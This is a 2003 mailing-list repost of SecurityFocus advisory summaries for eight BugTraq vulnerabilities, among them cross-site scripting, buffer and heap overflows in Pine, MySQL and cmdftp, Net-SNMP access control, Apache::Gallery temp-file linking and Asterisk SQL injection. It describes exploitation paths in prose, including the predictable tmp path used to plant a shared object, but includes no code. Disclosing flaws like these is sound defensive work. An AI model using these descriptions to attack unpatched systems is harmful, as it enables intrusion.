[gull-annonces] Résumé SecurityFocus Newsletter #214

Marc SCHAEFER schaefer at alphanet.ch
Sun Sep 21 15:11:02 CEST 2003


Python Publishing Accessories Error Messages Cross-Site Scri...
BugTraq ID: 8549
Remote: Yes
Date Published: Sep 05 2003
Relevant URL: http://www.securityfocus.com/bid/8549
Summary:
Python Publishing Accessories is a library consisting of python modules
that are used to create web publication systems.

A vulnerability has been reported to exist because of the error messages
returned to a user in Python Publishing Accessories.  This issue may allow
a remote attacker to execute HTML or script code in a user's browser due
to insufficient sanitization of user input.

The problem is reported to exist due to a lack of sanitization of error
messages by the software.  The vulnerable software is reported to include
requests for invalid URLs in error messages returned to a user without
proper sanitization.  HTML and script code will be rendered in a user's
browser, therefore making it possible for an attacker to a construct a
malicious link containing HTML or script code that may be rendered in a
user's browser upon visiting that link.  This attack would occur in the
security context of the affected site.

Successful exploitation of this vulnerability may allow an attacker to
steal cookie-based authentication credentials.  Other attacks may well be
possible.

This issue is reported to be present in Python Publishing Accessories
version 0.2.1, however prior versions may be affected as well.

Apache::Gallery Insecure Local File Storage Privilege Escala...
BugTraq ID: 8561
Remote: No
Date Published: Sep 08 2003
Relevant URL: http://www.securityfocus.com/bid/8561
Summary:
Apache::Gallery is a perl module designed to be used with Apache and
mod_perl. It's purpose is to create an index of picture thumbnails for
each directory hosted by the server.

When initializing Inline C from within the Gallery.pm file,
Apache::Gallery fails to sufficiently store the files within a secure
location. Specifically, it calls File::Spec->tmpdir() which will typically
return a world writable temporary directory. This directory is then used
for the storage of shared objects later linked to by Apache. These .so
files also use predictable file names, making it possible for an attacker
to potentially supply malicious shared object files that will be linked
into Apache.

An attacker could exploit this issue by constructing a malicious shared
object file. The file may need to contain specific functions expected by
Apache::Gallery to avoid errors. The attacker must simply place these
files within the /tmp/lib/auto/Apache/Gallery_4033 directory, or which
ever temporary directory is typically used, prior to Apache creating the
shared object there. It should be noted that these shared object files
must be replaced prior to the Apache process linking to them.

This will result in malicious code being linked to and executed within the
Apache process, effectively allowing for the execution of arbitrary code
with elevated privileges.

Net-SNMP Unauthorized MIB Object Access Vulnerability
BugTraq ID: 8582
Remote: Yes
Date Published: Sep 06 2003
Relevant URL: http://www.securityfocus.com/bid/8582
Summary:
Net-SNMP is a freely available, open source implementation of the SNMP
protocol. It was previously known as UCD-SNMP, and is available for the
Unix and Linux operating systems.

Net-SNMP is prone to a vulnerability that may permit an existing user or
community to gain unauthorized access to MIB objects.  MIB objects that
are explicitly excluded from a user's or community's view may still be
accessed due to this vulnerability.  This could potentially allow
malicious parties to gain read/write access to information contained in a
restricted MIB.

CmdFTP Store_Line() Heap Overflow Vulnerability
BugTraq ID: 8587
Remote: Yes
Date Published: Sep 08 2003
Relevant URL: http://www.securityfocus.com/bid/8587
Summary:
cmdftp is a command line FTP client for Linux.

cmdftp has been reported prone to a remote heap overflow vulnerability.
The issue presents itself likely due to insufficient boundary checks
performed by store_line() when handling ftp server directory listings.
Excessive data returned by a malicious FTP server, when an 'ls' command is
invoked, may overflow the bounds of a buffer in heap memory and result in
the corruption of adjacent heap memory management structures. Ultimately a
remote attacker may leverage this corruption to have supplied arbitrary
instructions executed in the context of the user who is running the
vulnerable FTP client.

This vulnerability has been reported to affect all versions of cmdftp
prior to version 0.641.

Pine Message/External-Body Type Attribute Buffer Overflow Vu...
BugTraq ID: 8588
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8588
Summary:
Pine is a freely available, open source Mail User Agent.  It is
distributed by the University of Washington, and available for the Unix,
Linux, and Microsoft platforms.

A problem in Pine has been reported when handling "message/external body
type" attributes.  Because of this, an attacker may be able to gain
unauthorized access to a host using the vulnerable software.

The problem is in the parsing of the name/value pairs.  Due to improper
bounds checking, it is possible to supply a value in this field that
results in the overwriting of sensitive process memory.  An attacker can
exploit this with a custom string to execute arbitrary code with the
privileges of the Pine user.

Pine rfc2231_get_param() Remote Integer Overflow Vulnerabili...
BugTraq ID: 8589
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8589
Summary:
Pine is an e-mail client program used with Linux and Unix distributions.

It has been reported that Pine is prone to an integer overflow condition
resulting in possible memory corruption and leading to arbitrary code
execution.

The vulnerability exists in the rfc2231_get_param() function present in
the strings.c file.  The condition is triggered when a vulnerable user
opens a maliciously crafted e-mail message sent by a remote attacker.  The
vulnerability exists due to insufficient bounds checking by the software
when parsing e-mail message headers.  Due to the possibility of memory
corruption, an attacker may be able to execute arbitrary code in the
security context of the vulnerable version of Pine.

Successful exploitation of this issue may allow an attacker to execute
arbitrary code in order to gain unauthorized access to a vulnerable host.

MySQL Password Handler Buffer Overflow Vulnerability
BugTraq ID: 8590
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8590
Summary:
MySQL is an open source relational database project. It is available for
the Microsoft Windows, Linux, and Unix operating systems.

MySQL server has been reported prone to a buffer overflow vulnerability
when handling user passwords of excessive size.

The issue presents itself, due to a lack of sufficient bounds checking
performed on MySQL user passwords that are stored in the 'Password' field
of the 'User' table in a MySQL database. It has been reported that MySQL
fails to properly perform bounds checking when processing passwords. A
password greater that 16 characters may overrun the bounds of a reserved
buffer in memory and corrupt adjacent memory. The buffer overflow occurs
in an ACL_USER instance of acl_init(), and may ultimately result in the
corruption of a saved instruction pointer.

An attacker with global administrative privileges on an affected MySQL
server may potentially exploit this condition to have arbitrary supplied
instructions executed in the context of the MySQL server.

This vulnerability has been reported to affect all versions of MySQL up to
and including 4.0.14 and 3.0.57.

Asterisk CallerID Call Detail Records SQL Injection Vulnerab...
BugTraq ID: 8599
Remote: Yes
Date Published: Sep 11 2003
Relevant URL: http://www.securityfocus.com/bid/8599
Summary:
Asterisk is a software-based PBX system, which is available for Linux
operating systems. Asterisk includes support for various protocols
including SIP, IAX v1 and v2, and H323. It is back-ended by a relational
database.

Call Detail Records (CDR) are used by telephone systems to record various
user data. This includes a variety of information, such as the CallerID
data.

Asterisk is prone to SQL injection attacks via malformed CDR data. The
vulnerability occurs due to insufficient sanitization of user-supplied
CallerID data and could allow for the execution of SQL commands on the
system hosting Asterisk. This could potentially be exploited by an
attacker to influence the logic of SQL queries or to exploit
vulnerabilities in the underlying database. Other attacks may also be
possible.

For an attacker to exploit this issue, it would have to be possible for
them to modify the CallerID data sent out by their phone system.



More information about the gull-annonces mailing list